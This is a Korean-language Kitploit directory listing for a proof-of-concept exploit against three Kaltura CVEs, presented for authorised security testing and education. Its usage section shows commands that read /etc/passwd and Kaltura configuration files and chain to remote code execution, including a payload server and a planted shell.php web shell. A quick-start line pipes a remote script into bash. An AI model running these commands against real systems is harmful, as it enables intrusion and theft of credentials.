Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-19912-CVE-2026-19913-CVE-2026-19914 — CVE-2026-19912, CVE-2026-19913, CVE-2026-19914에 대한 개념 증명 익스플로잇으로, Kaltura에서 파일 읽기 및 원격 코드 실행을 시연하며, 승인된 보안 테스트 및 교육을 위해 제작되었습니다. | Kitploit
도구/GitHubGitHub/horkimhab/cve-2026-19912-cve-2026-19913-cve-2026-19914
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLearning & Education
GitHubhorkimhab/cve-2026-19912-cve-2026-19913-cve-2026-19914

CVE-2026-19912-CVE-2026-19913-CVE-2026-19914

CVE-2026-19912, CVE-2026-19913, CVE-2026-19914에 대한 개념 증명 익스플로잇으로, Kaltura에서 파일 읽기 및 원격 코드 실행을 시연하며, 승인된 보안 테스트 및 교육을 위해 제작되었습니다.

저장소 보기
8시간 25분 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-19912, CVE-2026-19913, CVE-2026-19914

기부

이 프로젝트 유지 관리에 도움 주기

이 프로젝트가 유용하다고 생각되신다면, PayPal 또는 ABA Mobile을 통한 지속적인 유지 관리 지원을 고려해 주세요.

❤️ ១០% នៃការបរិច្ចាគរបស់អ្នក នឹងត្រូវបានបរិច្ចាគជូនមន្ទីរពេទ្យគន្ធបុប្ផា។

❤️ 모든 기부금의 10%는 칸타 보파 어린이 병원에 기부됩니다.

결제 수단 선택

PayPal로 안전하게 기부하기

ABA Mobile 기부 QR 코드
ABA Mobile로 스캔 · 클릭하여 확대

⚡ 간단한 사용법

GitHub에서 최신 버전의 외부 다운로드 스크립트를 직접 실행합니다:

root@kitploit:~
bash <(curl -fsSL https://raw.githubusercontent.com/HORKimhab/collection-scripts/main/get-svn.sh)

이 명령어는 Bash와 curl이 필요합니다. 소스를 신뢰할 수 없다면 실행 전에 원격 스크립트를 검토하세요.

이 프로젝트는 다음과 같은 안전하고 승인된 환경에서만 사용하세요:

  • 로컬 가상 머신
  • Docker 컨테이너
  • 격리된 실습 환경
  • 승인된 침투 테스트 환경

설정 예시:

root@kitploit:~
git clone <repository-url>
cd <repository-name>

# 프로젝트는 아래와 같이 Python을 사용합니다

# 가상 환경 생성
python -m venv venv

# 가상 환경 활성화

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# 요구 사항 설치
pip install -r requirements.txt

사용 예시:

root@kitploit:~
# 1. 파일 읽기 (가장 안정적이며, 문서에 설명된 대로 동작)
python3 kaltura_poc.py fileread http://127.0.0.1 -f /etc/passwd
python3 kaltura_poc.py fileread http://127.0.0.1 \
    -f /opt/kaltura/app/configurations/local.ini --try-versions

# 2. 페이로드 서버만 실행 (Burp / curl과 함께 수동으로 사용)
python3 kaltura_poc.py serve --lport 8888

# 3. 전체 체인 스켈레톤
python3 kaltura_poc.py rce http://127.0.0.1 \
    --lhost 172.17.0.1 --lport 8888 \
    --payload stdclass \
    --shell '../../../../../../../../var/www/html/shell.php'

크레딧 또는 참고 자료

  • https://anddone-git.github.io/2026/one-parameter-two-bugs/

📚 교육용 보안 연구 저장소

통제된 환경에서 사이버 보안 개념을 학습, 테스트, 연구하기 위한 저장소입니다.


⚠️ 보안 및 법적 고지

목적

이 저장소는 교육 및 승인된 보안 연구 전용입니다.

사용자가 다음에 대해 학습할 수 있도록 설계되었습니다:

  • 보안 취약점
  • 샌드박스 및 격리 개념
  • 안전한 코딩 및 방어적 관행

승인된 사용만 허용

이 저장소는 권한이 있는 환경에서만 사용하세요. 예:

  • 개인 실습 환경 또는 가상 머신
  • Docker 또는 격리된 환경
  • 승인된 침투 테스트
  • 사이버 보안 교육 또는 학술 연구

승인되지 않았거나 불법적인 사용은 엄격히 금지됩니다.


책임 없음

저자와 기여자는 이 프로젝트로 인해 발생하는 손해, 오용, 법적 문제 또는 손실에 대해 책임을 지지 않습니다.

이 저장소를 사용함으로써 다음 사항에 동의하게 됩니다:

  • 본인의 행동에 대한 책임은 본인에게 있습니다
  • 합법적이고 윤리적으로 사용할 것입니다
  • 이 프로젝트는 보증 없이 제공됩니다

윤리적 사용

이 프로젝트는 다음을 위해 제작되었습니다:

  • 방어적 보안 연구
  • 사이버 보안 교육
  • 취약점 인식 제고
  • 안전한 시스템 및 소프트웨어 연구

책임 있는 공개 절차를 준수하고 모든 관련 법률을 준수하시기 바랍니다.


연락처

책임 있는 공개 또는 협업을 위해 GitHub를 통해 저장소 관리자에게 연락하세요.


관련 프로젝트

승인된 보안 연구 및 교육을 위한 추가 CVE 개념 증명 리소스를 보려면 PoC CVE 컬렉션을 탐색하세요.

도구 다운로드